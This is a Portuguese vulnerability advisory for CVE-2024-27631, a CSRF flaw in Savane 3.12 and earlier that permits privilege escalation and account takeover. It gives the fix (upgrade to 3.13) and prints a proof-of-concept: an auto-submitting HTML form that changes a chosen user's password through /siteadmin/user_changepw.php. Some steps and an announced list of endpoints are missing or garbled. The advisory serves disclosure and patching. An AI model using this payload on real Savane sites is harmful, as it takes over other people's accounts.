
CVE-2024–27631 Referência
No Savane v3.12 e anteriores, a falta de proteção contra CSRF em funções administrativas pode permitir escalonamento de privilégios e/ou assunção de conta. Em particular, o endpoint /siteadmin/usergroup.php inclui a funcionalidade de alterar as senhas e as flags administrativas de outros usuários, permitindo efetivamente que um atacante se torne administrador.
Outros endpoints notáveis vulneráveis a CSRF incluem:
Classificação CWE: CWE-352: Cross-Site Request Forgery (CSRF)
Relatado por: Ally Petitt
Produto Afetado: Savane
Versões Afetadas: 3.12 e anteriores
Esta é uma Prova de Conceito (PoC) para alterar a senha da conta de outro usuário como um caminho para a assunção de conta.
/users/<username>).<savane_instance> pelo nome de domínio/endereço do host adequado.<form id="autosubmit" action="http://<savane_instance>/siteadmin/user_changepw.php" method="POST">
<input name="form_pw" type="hidden" value="Password1!" />
<input name="form_pw2" type="hidden" value="Password1!" />
<input name="user_id" type="hidden" value="<user_id>" />
<input name="update" type="hidden" value="Update" />
<input type="submit" value="Submit Request" />
</form>
<script>
document.getElementById("autosubmit").submit();
</script>
Password1!.Observe que este script de PoC foi testado no Firefox v103.0 (64-bit).
Atualize para o Savane versão 3.13 ou superior. O patch pode ser encontrado aqui.